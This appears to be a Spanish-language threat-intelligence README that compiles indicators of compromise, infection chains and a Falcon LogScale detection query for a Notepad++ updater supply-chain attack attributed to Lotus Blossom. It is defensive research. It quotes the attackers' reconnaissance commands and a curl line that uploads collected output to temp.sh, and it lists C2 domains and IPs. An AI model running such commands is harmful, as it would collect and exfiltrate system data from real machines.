
IoCs (indicadores de compromiso) y reglas de detección para el ataque a la cadena de suministro de Notepad++ (CVE-2025-15556) — APT Lotus Blossom, junio–diciembre de 2025. Incluye consultas de Falcon LogScale, reglas YARA/Sigma y mapeo de MITRE ATT&CK.
CVE-2025-15556 | Lotus Blossom / Raspberry Typhoon | Junio – Diciembre 2025
Este repositorio contiene una recopilación completa y consolidada de Indicadores de Compromiso (IoCs) relacionada con el ataque a la cadena de suministro de Notepad++ revelado el 2 de febrero de 2026.
Entre junio y diciembre de 2025, un actor de amenazas patrocinado por el estado chino comprometió la infraestructura de alojamiento de Notepad++, secuestrando el mecanismo de actualización integrado (WinGUp) para entregar selectivamente instaladores troyanizados a usuarios específicos. El ataque explotó la falta de verificación criptográfica en el actualizador (anterior a la v8.8.9), lo que permitió la distribución de backdoors personalizados, Cobalt Strike Beacons y payloads de Metasploit.
| CVE | CVE-2025-15556 — Descarga de código sin verificación de integridad |
| Actor de amenazas | Lotus Blossom (Bilbug, Raspberry Typhoon, Thrip) / Zirconium (Violet Typhoon) |
| Período de actividad | Junio 2025 – 2 de diciembre de 2025 |
| Vector de ataque | Compromiso de la cadena de suministro a través del actualizador automático WinGUp |
| Objetivos | Gobierno, telecomunicaciones, servicios financieros, proveedores de TI (Filipinas, Vietnam, El Salvador, Australia, Asia Oriental) |
| Malware | Backdoor Chrysalis (personalizado), Cobalt Strike Beacon, Metasploit Meterpreter |
| Corregido en | Notepad++ v8.8.9+ (verificación de certificados) / v8.9.1+ (validación XMLDSig) |
Kaspersky GReAT identificó tres cadenas de infección distintas, rotadas aproximadamente cada mes para evadir la detección:
GUP.exe → update.exe (NSIS) → ProShow.exe (legitimate) → exploit via "load" file
→ Metasploit downloader → Cobalt Strike Beacon
whoami && tasklist → exfiltrado vía temp.sh%appdata%\ProShow\GUP.exe → update.exe (NSIS) → script.exe (Lua interpreter) → alien.ini (compiled Lua)
→ shellcode via EnumWindowStationsW → Metasploit downloader → Cobalt Strike Beacon
whoami && tasklist && systeminfo && netstat -ano%appdata%\Adobe\Scripts\GUP.exe → update.exe (NSIS) → BluetoothService.exe (legitimate) → log.dll (sideloaded)
→ decrypts "BluetoothService" shellcode → Chrysalis backdoor
%appdata%\Bluetooth\C:\ProgramData\USOShared\ ┌─────────────────────────────────────────────────────────┐
│ COMPROMISE TIMELINE │
├─────────┬─────────┬─────────┬─────────┬─────────┬──────┤
│ Jul 25 │ Aug 25 │ Sep 25 │ Oct 25 │ Nov 25 │Dec 25│
├─────────┴─────────┴─────────┴─────────┴─────────┴──────┤
Chain #1 (ProShow) │████████████████████ │
Chain #2 (Lua) │ █████████████████████████████ │
Chain #3 (DLL SL) │ ██████████████ │
Infra access │████████████████████████████████████████████████████████│
└────────────────────────────────────────────────────────┘
| Archivo | Descripción |
|---|---|
notepadpp_supply_chain_iocs.csv | Conjunto de datos completo de IoCs (105 indicadores) con mapeo MITRE ATT&CK |
| Columna | Descripción |
|---|---|
ioc_type | Tipo: ip, domain, url, sha1, sha256, filepath, filename, useragent, behavior, cve, attribution, compromise_window |
ioc_value | El valor del indicador |
chain | Cadena de infección (1, 2, 3, 1/2, 2/3, all, n/a) |
context | Descripción de lo que representa el IoC |
source | Fuente de inteligencia (Kaspersky, Rapid7, CrowdStrike, Tenable, Kevin Beaumont) |
risk | Severidad (CRITICAL, HIGH, MEDIUM, LOW, INFO) |
mitre_technique | ID de técnica MITRE ATT&CK |
De comportamiento — independientes de IoC, de mayor valor:
gup.exe generando cualquier proceso hijo distinto de un instalador legítimo y firmado de Notepad++gup.exe conectándose a dominios/IPs distintos de notepad-plus-plus.org, github.com, release-assets.githubusercontent.com%appdata%\ProShow\, %appdata%\Adobe\Scripts\, %appdata%\Bluetooth\%localappdata%\Temp\ns.tmp\ (entorno de ejecución de NSIS — presente en todas las cadenas)De red — alta confianza:
cdncheck.it.com, safe-dns.it.com, self-dns.it.com, api.skycloudcenter.com, api.wiresguard.comtemp.sh (51.91.79.17) — especialmente con subida de archivos mediante curltemp.sh incrustadas en el encabezado User-Agent45.76.155.202, 45.32.144.255, 95.179.213.0, 45.77.31.210Comandos de reconocimiento (post-explotación):
cmd /c whoami&&tasklist > 1.txt
cmd /c "whoami&&tasklist&&systeminfo&&netstat -ano" > a.txt
curl -F "[email protected]" -s https://temp.sh/upload
#event_simpleName=ProcessRollup2 event_platform=Win ParentBaseFileName="gup.exe"
| FilePath=/\\Device\\HarddiskVolume\d+(?<shortFilePath>.+$)/
| groupBy([FileName, SHA256HashData, shortFilePath, CommandLine])